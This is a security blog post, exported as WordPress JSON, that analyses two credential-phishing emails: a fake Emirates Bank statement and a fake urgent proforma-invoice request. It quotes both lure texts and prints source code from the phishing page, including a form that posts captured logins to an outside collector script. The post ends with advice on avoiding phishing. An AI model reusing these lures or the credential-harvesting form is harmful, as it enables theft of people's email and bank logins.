{"id":12784,"date":"2022-07-12T16:14:59","date_gmt":"2022-07-12T16:14:59","guid":{"rendered":"https:\/\/myonlinesecurity.co.uk\/?p=12784"},"modified":"2023-04-01T06:34:02","modified_gmt":"2023-04-01T06:34:02","slug":"email-credential-phishing-via-fake-emirates-bank-statement-and-fake-generic-proforma-invoice-scams","status":"publish","type":"page","link":"https:\/\/myonlinesecurity.co.uk\/email-credential-phishing-via-fake-emirates-bank-statement-and-fake-generic-proforma-invoice-scams\/","title":{"rendered":"Email Credential Phishing Via Fake Emirates Bank Statement And Fake Generic Proforma Invoice Scams"},"content":{"rendered":"

We see lots of phishing attempts for email credentials. This morning we are seeing a series of \u201cattacks\u201d using Adobe as the lure. So far I have seen 2 different ones.<\/p>\n

Remember that many email clients, especially on a mobile phone or tablet, only show the name in the From: line and not the bit in <domain.com>. That is why these scams and phishes work so well.<\/p>\n

The First email looks like:<\/p>\n

From:<\/strong> Emirates Bank Online Statement <no-reply-googleaccountupdate@emailmessagingservices.com.pl><\/p>\n

Date:<\/strong> Wed 27\/09\/2021 00:30<\/p>\n

Subject:<\/strong> Cash Statement<\/p>\n

Attachment<\/strong>: Cash Statement.pdf<\/p>\n

Body Content:<\/strong><\/h3>\n

Dear Sir,<\/em><\/p>\n

Please kindly find attached bank statement debit notification and a copy of bank transferred receipt made in your favour today against your invoice.<\/em><\/p>\n

For your reference.<\/em><\/p>\n

Thank you.<\/em><\/p>\n

May M. Martinico<\/em><\/p>\n

Screenshot:<\/strong><\/h3>\n

\"\"<\/p>\n

This email has a genuine PDF attachment with a link to which will redirect you to . There is a warning on the bit.ly page that it is a phishing or malware site, but the page will still allow you to visit it by clicking the link.<\/p>\n

The phishing page refuses to display in Internet Explorer, Firefox or Chrome (just displaying a plain white page). It uses a data:text\/html;base64 URI.<\/p>\n

However, the downloaded HTML file will open on the computer, but only in Firefox.<\/p>\n

The page looks like this<\/p>\n

\"\"where if you enter any details and press submit, you are redirected to where you see this fake statement<\/p>\n

\"\"<\/p>\n

The next phishing scam works right out of the box with no effort.<\/p>\n

From:<\/strong> Chychou Ann <chychou@sce.pccu.edu.tw><\/p>\n

Date:<\/strong> Wed 27\/09\/2017 02:36<\/p>\n

Subject<\/strong>: Request For Proforma Invoice Urgent<\/p>\n

Attachment<\/strong>: Ugent New Order.pdf<\/p>\n

Body Content:<\/strong><\/h3>\n

Hello!<\/em><\/p>\n

Nice to contact you again after a long time.<\/em>
\nDo you still remember me am?<\/em><\/p>\n

Find attach our Ugent purchase order.Are the prices<\/em>
\nstill the same like before? Pls confirm to us<\/em><\/p>\n

and send me proforma invoice with Bank account and payment terms.<\/em><\/p>\n

Best regard<\/em><\/p>\n

Chychou Ann<\/em><\/p>\n

\"\"<\/p>\n

This PDF attachment looks like<\/p>\n

Where if you follow the link you go to where you see<\/p>\n

\"\"<\/p>\n

Entering details tries to redirect you to , where I get a 404 page not found (a quick lookup shows the site was registered by GoDaddy in 2001, the DNS is managed by Cloudflare and there is no site found, so it is highly likely that Cloudflare have null-routed the DNS already).<\/p>\n

A quick look at the source code of the 000webhost page shows that it appears to try to send the information via Googlemail, but I am not sure how successful that will be.<\/p>\n

<form method=\"POST\" action=\"http:\/\/alliancecr.com\/skd\/xendr.php\" \/><\/em><\/p>\n

<div style=\"position: absolute; width: 313px; height: 20px; z-index: 1; left: 476px; top: 240px\" id=\"layer3\"><\/em><\/p>\n

<input type=\"hidden\" name=\"continue\" id=\"continue\"<\/em><\/p>\n

value=\"http:\/\/mail.google.com\/mail\/\" \/><\/em><\/p>\n

<input type=\"hidden\" name=\"service\" id=\"service\"<\/em><\/p>\n

value=\"mail\" \/><\/em><\/p>\n

<input type=\"hidden\" id=\"_utf8\" name=\"_utf8\" value=\"&#9731;\"\/><\/em><\/p>\n

<input type=\"hidden\" name=\"bgresponse\" id=\"bgresponse\" value=\"js_disabled\"><\/em><\/p>\n

<input type=\"hidden\" name=\"challengestate\" id=\"challengestate\" value=\"AO4Zohb47sJS-tYrNsz1ONocIO2jeysxuca-R6LmDH0cX6Sjqn8BGWloBrG1WmwW-4r7QsnjCVJZNloVJdjdxBh2Zmw4RaTFp8vb9O9bAnlffm-82_cInUo\"><\/em><\/p>\n

We all get very blas\u00e9 about phishing and think we know so much that we will never fall for a phishing attempt. Don\u2019t assume that all attempts are obvious. Watch for any site that invites you to enter ANY personal or financial information. It might be an email that says \u201cyou have won a prize\u201d or \u201csign up to this website for discounts, prizes and special offers\u201d.<\/p>\n

Please read our How to protect yourselves page<\/a> for simple, sensible advice on how to avoid being infected by this sort of socially engineered malware.<\/p>\n

All of these emails use social engineering tricks to persuade you to open the attachments that come with the email. It might be a message saying \u201clook at this picture of me I took last night\u201d that appears to come from a friend, or one targeted more at somebody who is regularly likely to receive PDF attachments, Word .doc attachments or any other common file that you use every day. Or it might be a straightforward attempt, like this one, to steal your personal, bank, credit card or email and social networking login details.<\/p>\n

Be very careful when unzipping them and make sure you have \u201cshow known file extensions enabled<\/a>\u201d, and then look carefully at the unzipped file. If it says .EXE then it is a problem and should not be run or opened.<\/p>\n","protected":false},"excerpt":{"rendered":"

We see lots of phishing attempts for email credentials. This morning we are seeing a series of \u201cattacks\u201d using Adobe as the lure. So far I have seen 2 different ones Remember many email clients, especially on a mobile phone or tablet, only show the Name in the From: and not the bit in <domain.com…<\/p>\n","protected":false},"author":8,"featured_media":13404,"parent":0,"menu_order":0,"comment_status":"open","ping_status":"open","template":"","meta":{"_kad_blocks_custom_css":"","_kad_blocks_head_custom_js":"","_kad_blocks_body_custom_js":"","_kad_blocks_footer_custom_js":"","_kad_post_transparent":"default","_kad_post_title":"default","_kad_post_layout":"default","_kad_post_sidebar_id":"","_kad_post_content_style":"default","_kad_post_vertical_padding":"default","_kad_post_feature":"","_kad_post_feature_position":"","_kad_post_header":false,"_kad_post_footer":false,"footnotes":""},"taxonomy_info":[],"featured_image_src_large":["https:\/\/myonlinesecurity.co.uk\/wp-content\/uploads\/2022\/03\/email-phishing.jpg",1000,666,false],"author_info":{"display_name":"Darrel 
Heers","author_link":"https:\/\/myonlinesecurity.co.uk\/author\/darrel-heers\/"},"comment_info":0,"_links":{"self":[{"href":"https:\/\/myonlinesecurity.co.uk\/wp-json\/wp\/v2\/pages\/12784"}],"collection":[{"href":"https:\/\/myonlinesecurity.co.uk\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/myonlinesecurity.co.uk\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/myonlinesecurity.co.uk\/wp-json\/wp\/v2\/users\/8"}],"replies":[{"embeddable":true,"href":"https:\/\/myonlinesecurity.co.uk\/wp-json\/wp\/v2\/comments?post=12784"}],"version-history":[{"count":2,"href":"https:\/\/myonlinesecurity.co.uk\/wp-json\/wp\/v2\/pages\/12784\/revisions"}],"predecessor-version":[{"id":28325,"href":"https:\/\/myonlinesecurity.co.uk\/wp-json\/wp\/v2\/pages\/12784\/revisions\/28325"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/myonlinesecurity.co.uk\/wp-json\/wp\/v2\/media\/13404"}],"wp:attachment":[{"href":"https:\/\/myonlinesecurity.co.uk\/wp-json\/wp\/v2\/media?parent=12784"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}